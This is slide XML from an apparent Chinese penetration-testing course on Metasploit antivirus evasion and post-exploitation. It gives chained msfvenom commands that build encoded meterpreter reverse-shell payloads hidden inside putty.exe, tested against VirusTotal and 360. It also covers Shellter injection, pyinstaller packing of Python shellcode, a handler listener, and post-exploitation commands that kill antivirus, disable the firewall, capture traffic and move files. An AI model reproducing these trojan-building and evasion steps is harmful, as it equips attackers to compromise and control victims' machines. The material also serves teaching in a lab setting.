              <a:t>多重编码免杀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msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&amp;" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe &gt; shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>将下面生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>提交检测，查看能够过多少杀软</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&amp;" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -k -f exe &gt; shell.exe </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>http://virustotal.com/     主流杀软检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>验证静态免杀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>bypass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3366" y="903421"/>
            <a:ext cx="9504734" cy="7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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>hellter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收费版很强</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>免杀  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>win32 PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>才能注入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93366" y="1627396"/>
            <a:ext cx="8882434" cy="43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shellcode代码注入工具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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://www.shellterproject.com/download/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apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>shellter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p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</a:rPr>
              <a:t>shellter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会提示安装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windows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运行需要的环境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win32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报错的话根据错误提示安装就行了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</a:rPr>
              <a:t>dpkg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 --add-architecture i386 &amp;&amp; apt-get update &amp;&amp;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apt-get install wine32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5745" y="6296660"/>
            <a:ext cx="1291590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90500" y="165100"/>
            <a:ext cx="10185400" cy="57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</a:rPr>
              <a:t>shellter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启动软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设置为自动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设置目标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putty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路径在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: E:\TOOLS\TOOLS\03--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漏洞利用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\shelter\putty.exe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虚拟机下载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360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测试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90" y="700220"/>
            <a:ext cx="6047619" cy="17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932161"/>
            <a:ext cx="5474779" cy="17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20" y="2874658"/>
            <a:ext cx="4371429" cy="337142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90500" y="114300"/>
            <a:ext cx="10185400" cy="57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设置是否启用健康模式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payload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的类型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L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表示列表 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设置侦听的主机以及端口号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Kali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设置侦听，和之前其实没有区别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虚拟机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windows7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下载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360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测试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将生成的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putty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放入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windows7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中检测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启动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putty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、最新版本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360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过一会儿会删掉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 kill 360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进程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应用层无法杀掉进程 因为有驱动层保护，但是可以停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360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服务，重启以后让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360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启动不起来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221" y="480060"/>
            <a:ext cx="5284514" cy="40756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21" y="2057584"/>
            <a:ext cx="8076190" cy="1495238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" y="101600"/>
            <a:ext cx="8354695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免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msfpayload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" y="838200"/>
            <a:ext cx="11971020" cy="5423703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/>
              <a:t>生产</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>python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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter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reverse_tcp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LPORT=1125 LHOST=192.168.149.142 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -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17 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -o  /root/msf.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>将生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>msf.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>拖到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下进行编辑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在代码的头部和尾部分别加入代码   代码来源为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>: D:\cracer\day8\py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\msf-py-bypass.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>接下来将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>pyinstaller-2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>D:\cracer\day8\py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\pyinstaller-2.0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>解压放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>python27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>目录下</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>pywin32-219.win-amd64-py2.7.exe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python27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>目录下面打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>cdm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>之后</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>E:\Python27&gt;python27 pyinstaller-2.0\pyinstaller.py --console --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> msf.py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Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>打开监听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msf5 &gt; use exploit/multi/handler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msf5 exploit(multi/handler) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter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reverse_tcp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将生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>python exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中运行，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是否查杀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>运行后查看是否反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>建立会话   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>可以绕过静态查杀、动态查杀估计不行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3100" y="728113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信息搜集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51132" y="2213360"/>
            <a:ext cx="10392101" cy="372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msf&gt; db_nmap –sS –A192.168.1.111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msf&gt; db_services #查看扫描结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免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msfpayload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建立侦听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315" y="3414395"/>
            <a:ext cx="6117590" cy="302196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免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msfpaylaod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将生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件修改处理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2225040"/>
            <a:ext cx="6315075" cy="2124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235" y="2847340"/>
            <a:ext cx="7705725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下载pyinstall：https://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解压安装</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pywin32</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pip.exe install pywin32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python.exe pyinstaller-2.0\pyinstaller.py --console --onefile  pyinstaller-2.0\1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>.py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2461260"/>
            <a:ext cx="95916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免杀上线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135" y="1639570"/>
            <a:ext cx="10515600" cy="414274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venom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>免杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>paylaod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9135" y="1607185"/>
            <a:ext cx="10800715" cy="4972685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下载地址：https://github.com/r00t-3xp10it/venom</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>git clone https://github.com/r00t-3xp10it/venom.git</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>cd aux &amp;&amp; sudo ./setup.sh</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>4.运行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>sudo ./venom.sh</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更新版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>sudo ./venom.sh -u</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体使用参考 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档（该页面有具体的使用说明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https://github.com/r00t-3xp10it/venom</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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58950" y="2031365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7810" y="2840355"/>
            <a:ext cx="562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ozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0"/>
              <a:t>后渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>模块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什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>Meterpreter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 Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Meterpreter shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的链接。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Meterpreter shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、得到用户密码、上传下载远程主机的文件、运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>地址等信息。另外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>能够躲避入侵检测系统。在远程主机上隐藏自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>它不改变系统硬盘中的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HIDS[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>基于主机的入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>很难对它做出响应。此外它在运行的时候系统时间是变化的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。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http://www.cnblogs.com/backlion/p/9484949.html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479" y="186051"/>
            <a:ext cx="4359275" cy="71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dirty="0"/>
              <a:t>基本命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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75479" y="902177"/>
            <a:ext cx="9109541" cy="46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5000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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进程迁移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run post/windows/manage/migrate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自动迁移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可能会迁移到权限很低的进程中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不如手动迁移 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关闭杀软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现在不一定杀得掉了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run killav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通过其 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shell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来关闭防火墙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(windows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命令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 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不同的操作系统命令不一样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netsh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adcfirewall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set </a:t>
            </a:r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allprofiles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state off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查看目标机所有流量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run packetrecorder -i 1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提取系统信息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run scraper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ps 查看进程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migrate 1774 切换进程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截屏  screenshot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获取系统运行的平台 sysinfo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758" y="116567"/>
            <a:ext cx="8354695" cy="6400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基本操作命令 大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令都能够使用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758" y="756647"/>
            <a:ext cx="10955977" cy="5058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cat c:\boot.ini#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查看文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件必须存在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cd c:\\a.txt / cd:/a.txt   cd c:/Users/admin/Desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>格式就不用了使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\\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Del / rm c:\boot.ini #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>删除指定的文件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文件上传 文件上传和下载是上传或者下载的是当前的默认目录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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xx.ttx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upload /root/xx.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xx.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>将本地文件上传到服务器 ，也可以更改上传后的文件名称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upload /root/Desktop/netcat.exe c:\ # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>上传文件到目标机主上，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>upload  setup.exe C:\\windows\\system32\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download nimeia.txt /root/Desktop/   # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下载文件到本机上如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>download C:\\boot.ini /root/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edit c:\boot.ini  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编辑文件  不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>但是打开以后编辑功能和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
